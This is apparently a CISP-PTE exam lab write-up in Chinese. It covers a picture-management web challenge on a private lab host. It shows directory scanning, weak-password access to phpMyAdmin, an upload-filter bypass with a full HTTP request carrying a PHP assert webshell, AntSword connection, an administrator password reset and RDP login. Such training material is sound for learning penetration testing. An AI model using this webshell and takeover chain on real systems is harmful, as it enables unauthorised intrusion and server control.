CISP-PTE学习笔记综合考试题复现WP

文章目录

综合题 机智图片管理系统

题目

问题1：请扫描目标主机（IP地址请查看拓补图）开放的端口，key6就在【rebots.txt】中
问题2：key7存储在网站根目录下载的【key.php】文件中
问题3：请登录到远程计算机，key8将会在桌面上显示

解题WP

获取数据库管理后台

第一步 通过扫描目录，发现phpmyadmin的后台

 python dirsearch.py -u http://192.168.253.208/
 扫描后台，发现phpmyadmin，robots.txt

第二步 通过弱口令 成功进入数据库后台
http://192.168.253.208/phpmyadmin

第三步 通过管理查看后台数据库，获取key

获取shell

第一步 通过更改数据库的md5值，获取后台的账号
21232f297a57a5a743894a0e4a801fc3 admin

第二步 进入后台，发现文件上传点

通过更改后缀名，成功上传，

<?php @assert($_REQUEST['123']); ?>

POST /tupian/article_insert.php HTTP/1.1
Host: 192.168.253.208
Content-Length: 527
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.253.208
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryW8dVAGAJ9u0Xzh4r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.253.208/tupian/article_add.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tl3claduscvphiv60h4b3iolj4
Connection: close

------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r
Content-Disposition: form-data; name="pic_channel"

1
------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r
Content-Disposition: form-data; name="pic_name"

123456qwer
------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r
Content-Disposition: form-data; name="file[]"; filename="123.php"
Content-Type: image/jpeg

<?php @assert($_REQUEST['123']); ?>
------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r
Content-Disposition: form-data; name="submit"

添加上传
------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r--

第三步 查看图片的地址

http://192.168.253.208/tupian/uploadfile/16659316799123.php

第四步 远程蚁剑连接,在网站根目录发现key

http://192.168.253.208/tupian/uploadfile/16659316799123.php
123

获取管理员，远程桌面

第一步 通过查看当前用户的权限，为管理员权限
whoami

第二步 更改管理员的密码
net user administartor QWE123456com!
注意，这得符合密码复杂度要求

第三步 进行远程连接桌面连接
mstsc

第四步 通过查看回收站，发现key